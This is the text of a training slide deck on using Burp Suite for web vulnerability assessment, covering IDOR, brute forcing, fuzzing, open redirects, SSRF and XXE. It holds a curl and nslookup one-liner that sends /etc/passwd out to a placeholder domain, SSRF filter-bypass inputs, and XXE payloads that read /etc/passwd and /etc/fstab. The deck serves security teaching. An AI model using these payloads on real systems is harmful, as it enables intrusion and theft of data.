This document provides an overview of Burp Suite and how to use its features to perform vulnerability assessments. It discusses Burp Suite's key components like the proxy, scanner, intruder, repeater, collaborator, and extender. It also covers techniques like bypassing filters, server-side request forgery, XML external entities, and common vulnerabilities to target like open redirects, insufficient entropy, and insecure deserialization.

2. 2
Who am I?
• Bug hunter
• Security consultant
• 10+ years experience
• My virtual home: https://memoryleaks.ir/
• Twitter: Voorivex
2

3. BurpSuite
• BurpSuite 2.x
• Cross platform (Java)
• Nice suite for perform vulnerability assessment
• Configurable and extendable
3

4. BurpSuite
Dashboard
Target
Scanner
Proxy
Intruder
Repeater
Collaborator
Sequencer
Options Extender
4
INTERPRISE EDITION

5. Dashboard
• Automated operations:
• Crawl (known as spider in BurpSuite 1.x)
• Crawl and Audit (Active scan)
• User-driven operations:
• Active scan
• Passive scan
• Passive crawl
5

6. Target
• Site map
• Useful to find dir, files and execution paths
• Scope
• https://site.com/solid
• https://site.com/.*
• https://site.com/path/.*
6

7. Proxy
• Most useful option
• Not only a proxy, but interceptor
• All requests and responses can be intercepted
• Useful to find out the workflows
7

8. How to intercept the HTTPs traffic?
8

9. HTTP(s) Traffic
BurpSuite Proxy Target
HTTP(s) Traffic
HTTP(s) Traffic HTTP(s) TrafficModify
User
9

10. HTTP Strict Transport Security
• Web security mechanism to prevent
• Man in the middle attack
• Visiting site by HTTP
• Visiting site by invalid certificate
• Since the BurpSuite does MITM, HSTS stops it
10

11. How to remove HSTS
• Exporting and installing Burp’s CA certificate
• Demo time :)
11

12. HOL - Inappropriate error handling
• Searching through the logs
• Watching the responses carefully
• Chasing the responses
• Let’s hack :)
12

13. HOL - Execution after Redirect
• JavaScript redirects are not safe
• Browsers always follow the redirects
• But attackers not
• Ignoring redirects and retrieving sensitive content
• Searching through the logs
• Let’s hack :)
13

14. Removing Tools Signature
• Tools produce signatures
• The BurpSuite can be in the middle to
• Capturing the tool/script traffic
• Modifying the traffic
• Removing signatures
14

15. BurpSuite Proxy TargetAcunetixUser
Auto
Modify
15

16. Repeater
• It repeats the requests
• Manipulating and reissuing HTTP and WebSocket messages
• Good choice to discover IDOR
16

17. Insecure Direct Object Reference
• Direct access to objects based on user-supplied input
• http://foo.bar/somepage?invoice=12345
• User ID in JSON/XML formats
• Downloading a file by the name
• Let’s see a case
• https://hackerone.com/reports/287789
17

18. Backend Server
Login Information
Information
API Call + user_id
user_id
API Call + user_id
Information
UserAttacker
18

19. Intruder
• Automating customized attacks against web applications
• Extremely powerful and configurable
• Brute-force guessing
• Fuzzing dir, files and paths
• Exploiting blind SQLi (here)
• Multi thread, delay, payloads and etc
19

20. Intruder Options
• Burp’s intruder has several options, use
• Sniper to fuzz a single input
• Battering ram to custom attacks
• Pitchfork for leaked credentials
• Cluster bomb for separated lists
• Demo time :)
20

21. Powerful Payloads
• Get powerful lists:
• Seclist - (here)
• PayloadsAllTheThings - (here)
• Bo0om fuzz - (here)
• Make custom lists
21

22. Conducting a Brute Force
• Get a username list
• Get a password list
• Brute force and endpoint to find valid credentials
• Let’s hack :)
22

23. Fuzzing Hidden Files and Dias
• Fuzz for directories
• Fuzz inside directory by [fuzz].[ext]
• Fuzz inside directory by [fuzz]
• Fuzz web service methods by [fuzz]
• Let’s hack :)
23

24. Fuzzing Vague Values
• Some websites have vague values
• Base64 inputs
• Hash inputs
• There are several processor for payloads
• Let’s hack :)
24

25. Burp Collaborator
• A network service to discover vulnerabilities
• It captures Out of Band (OOB) requests
• HTTP(s) requests
• DNS lookups
• Uses a valid, CA-signed, wildcard TLS certificate
• Useful to find SSRF, XXE, blind XSS and etc
25

26. HTTP(s) Traffic
Application
DNS or HTTP
User
Check
Response
Data
26

27. How to send data out of the server through HTTP/DNS?
27

28. Burp Collaborator
• It provides an address
• [unique].burpcollaborator.net
• zpsh3143whnrugrsbrjkadsa016suh.burpcollaborator.net
• The burpcollaborator.net domain might be filtered
• Can be used to steal information
• curl domain.tld -d "`cat /etc/passwd | base64 -w 0`”
• nslookup [hexdata].domain.tld
28

29. Sequencer
• Analyzing the quality of randomness
• Application's session tokens
• Anti-CSRF tokens
• Password reset tokens
• Demo time :)
29

30. Insufficient Entropy
• Using sequencer to find insufficient entropy
• Let’s hack :)
30

31. Extender
• To extend Burp's functionality using third-party code
• Languages: Python, Ruby and Java
• There are good plugins, such as Active Scan++
• Demo time :)
31

32. Options
• There are some useful options
• Upstream or Socks proxy are good
• Demo time :)
32

33. Open Redirect
33

34. Open Redirect
• Known as Unvalidated Redirects and Forwards
• Redirect a user to a website without any validation
• Exploit? Depending on the architecture of website
• https://site.tld/r?URI=https%3A%2F%2Fwww.google.com
• Usually URI parameter is protected by a REGEX
• The REGEX should not be vulnerable :)
34

35. How SSO and oAuth bleed?
• Open Redirect :)
35

36. Vulnerable REGEX
• (Server side) Steps to redirect
• Extracting the host from URL
• Checking the host by whitelist
• Permission of the redirect
• Can you spot the vulnerability?
• https?://(www.)?(?P<host>[a-z0-9.-_]*)(/.*)?
36

37. Case Study
37

38. Time to Hack :)
• It’s time to hack :)
38

39. Server-Side Request Forgery
39

40. Introduction
• The ability to create requests from the vulnerable server to
intra/internet
• Interacting to:
• Cloud server meta-data
• Database HTTP interfaces
• Internal REST interfaces
• Reading files
• Scanning internal IP/Port
40

41. Example
41

42. Web Server
Web Server
Direct request is
1
2 3
4
42

43. The Vulnerable Code
43

44. Attack Example
• The code is vulnerable to SSRF
• Normal usage:
• https://site.com/?url=index
• Attack vector:
• https://site.com/?url=http://127.0.0.1:9200/
• https://site.com/?url=http://127.0.0.1:8080/manager/
44

45. Various Schemes
• Protocols can extent the attack surface of SSRF
• Example:
• https://site.com/?url=file:///etc/passwd
• https://site.com/?url=dict://localhost:3779/
45

46. Schemes
• Protocols can extent the attack surface of SSRF
• file:/// -> Allows an attacker to fetch the content of a file on the server
• dict:// -> Used to refer to word lists available using the DICT protocol
• sftp:// -> Used for secure file transfer over secure shell
• ldap:// -> Lightweight Directory Access Protocol
• tftp:// -> Trivial File Transfer Protocol, works over UDP
• gopher:// -> designed for distributing, searching, and retrieving documents
• http:// -> Used to fetch any content from the web
• https:// -> Same as the http
46

47. Detection
• Listen a common port in the server
• Put the https://ip in the URL-like inputs
47

48. Filters
• Some filters forbid:
• Sending requests to internal IP addresses
• Changing URL scheme
• Sending requests to Not white-listed domains
• https?://(www.)?domain.com/.+
• https?://.+?.?domain.com/.+
48

49. Time to Hack :)
• It’s time to hack :)
49

50. Bypass Filters 1
• Internal IP address filters
• Using domain instead of IP address
• The xip.io is a magic DNS server
• dig A 10.0.0.1.xip.io
• dig A anything.10.0.0.1.xip.io
• dig A 1ynrnhl.xip.io (base32(int(‘254.169.254.169’)))
• Open Redirect in white-listed domains
• Alternate IP addresses:
• 127.1 or 0x7F000001
• http://[::1]/ or http://[::]/
50

51. Bypass Filters 2
• Scheme filters
• Can by bypassed by server-side redirect:
• https://domain.tld/?url=https://attacker.tld/r.php
• r.php contents:
51

52. Bypass Filters 3
• White-listed domain filter
• Open Redirect vulnerability
• https://domain.tld/?url=https://sub.domain.tld/?
next=https://attacker.com
52

53. Trick
• A magic inputs:
• Url = https://user@evil.com@domain.tld/
• curl url -> request to evil.com
• (php) parse_url(url) -> host: domain.tld
• Example:
• https://fireshellsecurity.team/sunshinectf-search-
box/
53

54. XML External Entity
54

55. XML External Entity
• XML (Extensible Markup Language) is a very popular data
format.
• Some applications use the XML format to transmit data
between the browser and the server.
• Altering XML may lead to XXE
• XXE allows an attacker to interfere with an
application's processing of XML data.
• XML specification contains various potentially
dangerous features.
55

56. Saving the XML File
Response
Parsing the XML File
Web Service
Backend Server
56

57. XML External Entity
POST /endpoint HTTP/1.1
<foo>
Hello World
</foo>
HTTP/1.1 200 OK
Hello World
POST /endpoint HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar "World">
]>
<foo>
Hello &bar;
</foo>
HTTP/1.1 200 OK
Hello World
57

58. XML External Entity
• It seems harmless?
• XML parsers are configured to process external entities
• System identifier: is a document-processing construct
• There are two identifiers in XML:
• Public
• System
• A SYSTEM identifier specifies the exact location of file
58

59. XML External Entity
POST /endpoint HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM
"file:///etc/passwd">
]>
<foo>
&xxe;
</foo>
HTTP/1.0 200 OK
root:x:0:0:root:/root:/
bin/bash
daemon:x:1:1:daemon:/usr/
sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
(...)
59

60. PHP Wrappers
POST /endpoint HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM
"php://filter/read=convert.base64-encode/resource=/etc/fstab">
]>
<foo>
&bar;
</foo>
HTTP/1.0 200 OK
IyAvZXRjL2ZzdGFiOiBzdGF0aWMgZmlsZSBzeXN0ZW0g
aW5mb3JtYXRpb24uDQojDQojIDxmaWxlIHN5c3R...
60

61. XML External Entity
• Attackers are not limited to system files
• Some XML parsers, it’s even possible to get directory
listings
• Attackers can also send HTTP(s) requests by
• http://
• https://
• gopher://
• dict://
61

62. Directory Listing
• Some parsers allow directory listing in XXE
• <!ENTITY % file SYSTEM “file:///etc/“>
62

63. More Scenarios
• Many applications support a “File Upload” functionality
• XLSX, DOCX, PPTX, SVG or any XML MIME type formats
• The application processes files
• These files have an XML MIME type
• An attacker could take advantage of the XML
• root-me.org, SamBox-v3 is a good example
63

64. Get in touch
https://twitter.com/ravinacademy
https://www.linkedin.com/company/ravin-academy/about/
https://t.me/ravinacademy
info@ravinacademy.com
64